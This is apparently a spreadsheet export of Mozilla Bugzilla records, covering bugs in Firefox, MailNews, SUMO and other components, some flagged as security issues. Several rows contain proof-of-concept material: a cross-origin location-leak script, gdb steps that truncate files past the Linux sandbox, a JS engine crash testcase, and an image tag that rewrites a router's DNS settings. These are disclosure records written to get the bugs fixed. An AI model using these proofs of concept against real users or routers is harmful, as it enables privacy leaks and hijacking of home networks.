Expected results: Frames should not load and show an error page.</t>
        </is>
      </c>
      <c r="X74" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" t="n">
        <v>1373276</v>
      </c>
      <c r="B75" t="inlineStr">
        <is>
          <t>2017-06-15 08:25:41 -0700</t>
        </is>
      </c>
      <c r="C75" t="inlineStr">
        <is>
          <t>Call POST /account/devices/notify in the send tab extension</t>
        </is>
      </c>
      <c r="D75" t="inlineStr">
        <is>
          <t>2017-07-05 07:00:00 -0700</t>
        </is>
      </c>
      <c r="E75" t="n">
        <v>1</v>
      </c>
      <c r="F75" t="n">
        <v>1</v>
      </c>
      <c r="G75" t="n">
        <v>2</v>
      </c>
      <c r="H75" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I75" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J75" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K75" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L75" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M75" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N75" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O75" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P75" t="inlineStr">
        <is>
          <t>[MobileCore][AutoPush]</t>
        </is>
      </c>
      <c r="Q75" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R75" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S75" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T75" t="n">
        <v>1</v>
      </c>
      <c r="U75" t="n">
        <v>0</v>
      </c>
      <c r="V75" t="n">
        <v>5</v>
      </c>
      <c r="W75" t="inlineStr">
        <is>
          <t>When a tab is sent, the Send Tab extension uploads a displayURI record to the Clients collection.
Then, the target device syncs the clients collection, and receives the deviceURI record.
There is nothing in place to prompt the target device to start that sync. 
This is the purpose of the /account/devices/notify endpoint. 
https://github.com/mozilla/fxa-auth-server/blob/master/docs/api.md#post-accountdevicesnotify
This might be a dupe of https://bugzilla.mozilla.org/show_bug.cgi?id=1295351</t>
        </is>
      </c>
      <c r="X75" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" t="n">
        <v>136443</v>
      </c>
      <c r="B76" t="inlineStr">
        <is>
          <t>2002-04-09 13:42:37 -0700</t>
        </is>
      </c>
      <c r="C76" t="inlineStr">
        <is>
          <t>Stop button not working in mailnews</t>
        </is>
      </c>
      <c r="D76" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:50 -0700</t>
        </is>
      </c>
      <c r="E76" t="n">
        <v>1</v>
      </c>
      <c r="F76" t="n">
        <v>1</v>
      </c>
      <c r="G76" t="n">
        <v>3</v>
      </c>
      <c r="H76" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I76" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J76" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K76" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L76" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M76" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N76" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O76" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P76" t="inlineStr">
        <is>
          <t>[adt1]verified on branch builds already</t>
        </is>
      </c>
      <c r="Q76" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R76" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S76" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T76" t="n">
        <v>1</v>
      </c>
      <c r="U76" t="n">
        <v>0</v>
      </c>
      <c r="V76" t="n">
        <v>23</v>
      </c>
      <c r="W76" t="inlineStr">
        <is>
          <t>Stop doesn't stop any mailnews operations</t>
        </is>
      </c>
      <c r="X76" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" t="n">
        <v>1242279</v>
      </c>
      <c r="B77" t="inlineStr">
        <is>
          <t>2016-01-24 11:39:48 -0800</t>
        </is>
      </c>
      <c r="C77" t="inlineStr">
        <is>
          <t>Assertion failure: Argument check fail., at js/src/jit/MacroAssembler.cpp:1445 with OOM</t>
        </is>
      </c>
      <c r="D77" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:26 -0700</t>
        </is>
      </c>
      <c r="E77" t="n">
        <v>1</v>
      </c>
      <c r="F77" t="n">
        <v>1</v>
      </c>
      <c r="G77" t="n">
        <v>3</v>
      </c>
      <c r="H77" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I77" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J77" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K77" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L77" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M77" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N77" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O77" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P77" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main45+][adv-esr38.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q77" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R77" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S77" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T77" t="n">
        <v>1</v>
      </c>
      <c r="U77" t="n">
        <v>0</v>
      </c>
      <c r="V77" t="n">
        <v>17</v>
      </c>
      <c r="W77" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 5f7c184ccd80 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off --baseline-eager --ion-eager):
lfBuffer = `
objectEmulatingUndefined = function() 0;  
new Date().toLocaleString("enUS", {});
oomTest(()=&gt; 0({thisprops: gc() &amp;&amp; addDebuggee.enabled}));
`
lfBuffer = lfBuffer.split("\n");
lfCodeBuffer = 0;
for (i = 0; i &lt; 10; ++i) {
    line = lfBuffer.shift()
    lfCodeBuffer += line + "\n"
    loadFile(lfCodeBuffer)
    function loadFile(lfVarx) {
                eval(lfVarx)
    }
}
Backtrace:
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7f87c00 in ?? ()
#0  0x00007ffff7f87c00 in ?? ()
#1  0x00007ffff7f24f7d in ?? ()
#2  0x0000000000000a00 in ?? ()
#3  0x00007ffff7e8c651 in ?? ()
#4  0x0000000000000000 in ?? ()
rax	0x7ffff7eca250	140737352868432
rbx	0x7ffff7f87a49	140737353644617
rcx	0xfffafffff7ea60d0	-1407375019188016
rdx	0x7ffff4800680	140737295419008
rsi	0x0	0
rdi	0x7fffffff4bb0	140737488309168
rbp	0x4	4
rsp	0x7fffffff4db0	140737488309680
r8	0x6	6
r9	0x0	0
r10	0xc8e65ca2	3370540194
r11	0x7ffff6c27960	140737333328224
r12	0x73	115
r13	0x7fffffff5580	140737488311680
r14	0x0	0
r15	0x7ffff48005c0	140737295418816
rip	0x7ffff7f87c00	140737353645056
=&gt; 0x7ffff7f87c00:	movabs $0x7ffff695d1f8,%r11
   0x7ffff7f87c0a:	cmp    %rsp,(%r11)
This OOM is quite fragile, just addings prints anywhere in the code make the crash go away. I've seen this before but only this time I was able to extract a proper test.</t>
        </is>
      </c>
      <c r="X77" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" t="n">
        <v>645709</v>
      </c>
      <c r="B78" t="inlineStr">
        <is>
          <t>2011-03-28 09:04:02 -0700</t>
        </is>
      </c>
      <c r="C78" t="inlineStr">
        <is>
          <t>Move top contributor calculation to cron and make it more stable</t>
        </is>
      </c>
      <c r="D78" t="inlineStr">
        <is>
          <t>2011-03-30 14:01:30 -0700</t>
        </is>
      </c>
      <c r="E78" t="n">
        <v>1</v>
      </c>
      <c r="F78" t="n">
        <v>1</v>
      </c>
      <c r="G78" t="n">
        <v>5</v>
      </c>
      <c r="H78" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I78" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J78" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K78" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L78" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M78" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N78" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O78" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P78" t="inlineStr"/>
      <c r="Q78" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R78" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S78" t="inlineStr">
        <is>
          <t>2.7</t>
        </is>
      </c>
      <c r="T78" t="n">
        <v>1</v>
      </c>
      <c r="U78" t="n">
        <v>0</v>
      </c>
      <c r="V78" t="n">
        <v>6</v>
      </c>
      <c r="W78" t="inlineStr">
        <is>
          <t>The top contributor calculation doesn't need to be a task, and is possibly jamming the queue, since it's not showing up right now. We should move it from a task to a cron and run it every few hours or day.</t>
        </is>
      </c>
      <c r="X78" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" t="n">
        <v>799952</v>
      </c>
      <c r="B79" t="inlineStr">
        <is>
          <t>2012-10-10 07:42:47 -0700</t>
        </is>
      </c>
      <c r="C79" t="inlineStr">
        <is>
          <t>Cross domain access to the location object</t>
        </is>
      </c>
      <c r="D79" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:49 -0700</t>
        </is>
      </c>
      <c r="E79" t="n">
        <v>1</v>
      </c>
      <c r="F79" t="n">
        <v>1</v>
      </c>
      <c r="G79" t="n">
        <v>3</v>
      </c>
      <c r="H79" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I79" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J79" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K79" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L79" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M79" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N79" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O79" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P79" t="inlineStr">
        <is>
          <t>fixed by bug 720619</t>
        </is>
      </c>
      <c r="Q79" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R79" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S79" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T79" t="n">
        <v>1</v>
      </c>
      <c r="U79" t="n">
        <v>0</v>
      </c>
      <c r="V79" t="n">
        <v>45</v>
      </c>
      <c r="W79" t="inlineStr">
        <is>
          <t>http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-your-friends-did-last-summer/
function poc() {
var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200,height=200');
setTimeout(function(){
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
}, 5000);
}
I can't reproduce in 15 or trunk, but 16 is affected.</t>
        </is>
      </c>
      <c r="X79" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" t="n">
        <v>1244000</v>
      </c>
      <c r="B80" t="inlineStr">
        <is>
          <t>2016-01-28 19:09:19 -0800</t>
        </is>
      </c>
      <c r="C80" t="inlineStr">
        <is>
          <t>[TV][2.5][Web Apps] After scrolling, focused icon will exceed screen</t>
        </is>
      </c>
      <c r="D80" t="inlineStr">
        <is>
          <t>2016-02-03 21:59:20 -0800</t>
        </is>
      </c>
      <c r="E80" t="n">
        <v>1</v>
      </c>
      <c r="F80" t="n">
        <v>1</v>
      </c>
      <c r="G80" t="n">
        <v>6</v>
      </c>
      <c r="H80" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I80" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J80" t="inlineStr">
        <is>
          <t>Gaia::TV</t>
        </is>
      </c>
      <c r="K80" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L80" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M80" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N80" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O80" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P80" t="inlineStr">
        <is>
          <t>[ft:conndevices]</t>
        </is>
      </c>
      <c r="Q80" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R80" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S80" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T80" t="n">
        <v>1</v>
      </c>
      <c r="U80" t="n">
        <v>0</v>
      </c>
      <c r="V80" t="n">
        <v>7</v>
      </c>
      <c r="W80" t="inlineStr">
        <is>
          <t>Created attachment 8713442
Screenshot from 2016-01-29 11:00:00.png
[Blocking Requested - why for this release]:
[Description]
Navigating app/website to another row, the focused icon will exceed screen after scrolling
[Reproduce Steps]
1. Launch Apps -&gt; Web Apps/Dev Web Apps
2. Navigating to the third row
[Build Information]
Environment: 2.5 Simulator
gaia:
https://github.com/mozilla-b2g/gaia/commit/8a0d9deb2cd47df25750ed2c6820909e4feac3bb
gecko:
https://hg.mozilla.org/releases/mozilla-b2g44_v2_5/rev/2b6f8826861a846c3d1d98ef595c8dfbf8b59328
mulet:
https://hg.mozilla.org/releases/mozilla-b2g44_v2_5/rev/2b6f8826861a846c3d1d98ef595c8dfbf8b59328 
[Expected Result]
Can show complete icon
[Actual Result]
Focused icon will exceed screen</t>
        </is>
      </c>
      <c r="X80" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" t="n">
        <v>1374281</v>
      </c>
      <c r="B81" t="inlineStr">
        <is>
          <t>2017-06-19 06:13:52 -0700</t>
        </is>
      </c>
      <c r="C81" t="inlineStr">
        <is>
          <t>linux sandbox broker permits truncating files using read-only access</t>
        </is>
      </c>
      <c r="D81" t="inlineStr">
        <is>
          <t>2018-02-01 16:46:14 -0800</t>
        </is>
      </c>
      <c r="E81" t="n">
        <v>1</v>
      </c>
      <c r="F81" t="n">
        <v>1</v>
      </c>
      <c r="G81" t="n">
        <v>3</v>
      </c>
      <c r="H81" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I81" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J81" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K81" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L81" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M81" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N81" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O81" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P81" t="inlineStr">
        <is>
          <t>[sb+][adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q81" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R81" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S81" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T81" t="n">
        <v>1</v>
      </c>
      <c r="U81" t="n">
        <v>0</v>
      </c>
      <c r="V81" t="n">
        <v>16</v>
      </c>
      <c r="W81" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36
Steps to reproduce:
[I'm filing this as a restricted bug because this is a lack of validation in security-sensitive code; however, I don't see any real security impact here. Feel free to derestrict the bug if you agree.]
On Linux:
1. Launch Firefox.
2. Ensure that a content process is used.
3. Create a non-empty file in the home directory:
    $ echo foobar &gt; ~/testfile
4. Attach to the content process with gdb and verify that ~/testfile can be opened in readonly mode (O_RDONLY=0), but not as writable (O_WRONLY=1, O_RDWR=2):
    $ gdb attach 4436
    [...]
    0x00007f4805fa384d in poll () from /lib/x86_64-linux-gnu/libc.so.6
    (gdb) handle SIGSYS nostop noprint pass 
    Signal        Stop	Print	Pass to program	Description
    SIGSYS        No	No	Yes		Bad system call
    (gdb) print open("/home/user/testfile", 0)
    $2 = 40
    (gdb) print open("/home/user/testfile", 1)
    $3 = -1
    (gdb) print open("/home/user/testfile", 2)
    $4 = -1
5. Use gdb to inject open("/home/user/testfile", O_RDONLY|O_TRUNC):
    (gdb) print open("/home/user/testfile", 0x200)
    $5 = 42
Actual results:
~/testfile was truncated:
$ ls -l ~/testfile
-rw-r----- 1 user user 0 Jun 19 15:07 /home/user/testfile
Expected results:
The sandbox should prevent any modifications to ~/testfile. O_TRUNC should always require write access.</t>
        </is>
      </c>
      <c r="X81" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" t="n">
        <v>9510</v>
      </c>
      <c r="B82" t="inlineStr">
        <is>
          <t>1999-07-09 12:36:27 -0700</t>
        </is>
      </c>
      <c r="C82" t="inlineStr">
        <is>
          <t>Scrolling along Related Links on SideBar leads to crash</t>
        </is>
      </c>
      <c r="D82" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E82" t="n">
        <v>1</v>
      </c>
      <c r="F82" t="n">
        <v>1</v>
      </c>
      <c r="G82" t="n">
        <v>2</v>
      </c>
      <c r="H82" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I82" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J82" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K82" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L82" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M82" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N82" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O82" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P82" t="inlineStr"/>
      <c r="Q82" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R82" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S82" t="inlineStr">
        <is>
          <t>M9</t>
        </is>
      </c>
      <c r="T82" t="n">
        <v>1</v>
      </c>
      <c r="U82" t="n">
        <v>0</v>
      </c>
      <c r="V82" t="n">
        <v>7</v>
      </c>
      <c r="W82" t="inlineStr">
        <is>
          <t>One way to reproduce this:
1) Load www.chosun.com and switch charset to Korean for proper display.
2) Open SideBar and Related Links folder subsequently.
3) Double click on any of these related links and let the page load.
4) Move scroll bar up and down several times.
==&gt; Program Crash follows shortly.
For stack trace info, refer to the URL above.
Observed in 7/9 M8 Win 32 bld under Win NT 4.0 JA.</t>
        </is>
      </c>
      <c r="X82" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" t="n">
        <v>1435319</v>
      </c>
      <c r="B83" t="inlineStr">
        <is>
          <t>2018-02-02 09:45:08 -0800</t>
        </is>
      </c>
      <c r="C83" t="inlineStr">
        <is>
          <t>Dragging an email from Outlook into a Firefox tab redirects to malicious site</t>
        </is>
      </c>
      <c r="D83" t="inlineStr">
        <is>
          <t>2018-08-21 16:24:27 -0700</t>
        </is>
      </c>
      <c r="E83" t="n">
        <v>1</v>
      </c>
      <c r="F83" t="n">
        <v>1</v>
      </c>
      <c r="G83" t="n">
        <v>3</v>
      </c>
      <c r="H83" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I83" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J83" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K83" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L83" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M83" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N83" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O83" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P83" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q83" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R83" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S83" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T83" t="n">
        <v>1</v>
      </c>
      <c r="U83" t="n">
        <v>0</v>
      </c>
      <c r="V83" t="n">
        <v>47</v>
      </c>
      <c r="W83" t="inlineStr">
        <is>
          <t>Created attachment 8947914
Malicious site with Freifox.jpg
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Steps to reproduce:
1. Open Outlook 2016 on a Windows device
2. Drag an email from Outlook, and drop it in a Firefox tab
Actual results:
1. Firefox then redirects to http://www.fromsubjectreceivedsizecategories.com/
2. That site in turns redirects to various malicious sites - an example is attached
3. The behaviour continues despite disabling the inline auto-complete option.  See http://kb.mozillazine.org/Inline_autocomplete
Note that the first site is a combination of the column headers in Outlook.  
Also note that I'm unable to reproduce this behaviour with Chrome or IE on Windows, or with Chrome, Firefox and Safari on Mac OSX.
Tested with only Firefox version 57.0.4
Expected results:
Firefox should not auto-complete the drag and drop from Outlook.</t>
        </is>
      </c>
      <c r="X83" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" t="n">
        <v>1255270</v>
      </c>
      <c r="B84" t="inlineStr">
        <is>
          <t>2016-03-09 20:01:34 -0800</t>
        </is>
      </c>
      <c r="C84" t="inlineStr">
        <is>
          <t>Favicon request doesn't timeout, or close when related window is closed</t>
        </is>
      </c>
      <c r="D84" t="inlineStr">
        <is>
          <t>2024-05-30 09:15:33 -0700</t>
        </is>
      </c>
      <c r="E84" t="n">
        <v>1</v>
      </c>
      <c r="F84" t="n">
        <v>1</v>
      </c>
      <c r="G84" t="n">
        <v>2</v>
      </c>
      <c r="H84" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I84" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J84" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K84" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L84" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M84" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N84" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O84" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P84" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q84" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R84" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S84" t="inlineStr">
        <is>
          <t>Firefox 49</t>
        </is>
      </c>
      <c r="T84" t="n">
        <v>1</v>
      </c>
      <c r="U84" t="n">
        <v>0</v>
      </c>
      <c r="V84" t="n">
        <v>68</v>
      </c>
      <c r="W84" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20160303134406
Steps to reproduce:
The Firefox does background request to load favicon.ico from the current web page. Unexpectedly, the connection is not terminated when the website window is closed which gives an server owner an ability to send data regularly to the browser and figure out when the transmission fails indicating the browser close. 
It is also possible to measure pings using ACKs. Theoretically, could it be possible to recognize mobile device geological position from a small list of alternative positions based on ping flow? Remember that the pinging is possible as long as browser is on.
Actual results:
No timeout on favicon connections.
Expected results:
Timeout on favicon connections.</t>
        </is>
      </c>
      <c r="X84" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" t="n">
        <v>371598</v>
      </c>
      <c r="B85" t="inlineStr">
        <is>
          <t>2007-02-25 02:11:19 -0800</t>
        </is>
      </c>
      <c r="C85" t="inlineStr">
        <is>
          <t>drive-by pharming: changing settings on home router without the user's knowledge</t>
        </is>
      </c>
      <c r="D85" t="inlineStr">
        <is>
          <t>2020-02-03 07:16:35 -0800</t>
        </is>
      </c>
      <c r="E85" t="n">
        <v>1</v>
      </c>
      <c r="F85" t="n">
        <v>1</v>
      </c>
      <c r="G85" t="n">
        <v>3</v>
      </c>
      <c r="H85" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I85" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J85" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K85" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L85" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M85" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N85" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O85" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P85" t="inlineStr"/>
      <c r="Q85" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R85" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S85" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T85" t="n">
        <v>1</v>
      </c>
      <c r="U85" t="n">
        <v>3</v>
      </c>
      <c r="V85" t="n">
        <v>8</v>
      </c>
      <c r="W85" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Through use of javascript and/or plain http requests (images, links, ...), settings of some broadband routers that use web-based configuration can be modified.
This can lead to various attacks when changes are made to DNS servers (think phishing), DMZ (NAT won't serve as basic firewall anymore), ...
Reproducible: Sometimes
Steps to Reproduce:
1. use a vulnerable router (with default password (note: on philips routers, a password is not required to perform this attack))
2. visit a web page that contains, for example, following code:
&lt;img src=http://192.168.1.1/cgi-bin/setup_dns.exe?page=setup_dns&amp;logout=&amp;dns1_1=208&amp;dns1_2=67&amp;dns1_3=222&amp;dns1_4=222&amp;dns2_1=208&amp;dns2_2=67&amp;dns2_3=220&amp;dns2_4=220&gt;
    -&gt; this sets, on a philips router, the dns servers to opendns.org without asking for a password
note: in the paper on "drive-by pharming" (see additional information) more examples are given (javascript on how to determine the router's ip address, brand and model (through use of images in the configuration page of the router))
Actual Results:  
DNS servers can be changed (leading to phishing attacks) but so can port forwarding rules, DMZ, wireless encryption, changing the firmware of the router, ...
Expected Results:  
Even though this is the responsibility of the router manufacturer and the user (change default password, ...), maybe firefox should prevent web pages from loading scripts/images/... from the ip of the router (or anything on the lan for that matter) if the user has not requested to actually visit http://&lt;ip of router&gt; (note: this does not prevent users from clicking a link that changes configuration...)
Maybe it's better to go to an error page that says "Do you want to change settings of your router?" 
See http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf 
and http://www.schneier.com/blog/archives/2007/02/driveby_pharmin.html
(and maybe http://it.slashdot.org/article.pl?sid=07/02/16/1421238)
note: I have not yet tested this on other routers that do require password authentication not just for visiting the configuration pages (check this by using for example wireshark(former ethereal) and saving what GET/POST requests are made during configuration. Afterwards, try issuing the same requests from a test html file and see whether configurations have changed.(you all know this, so I don't know why I'm writing this ;) ))
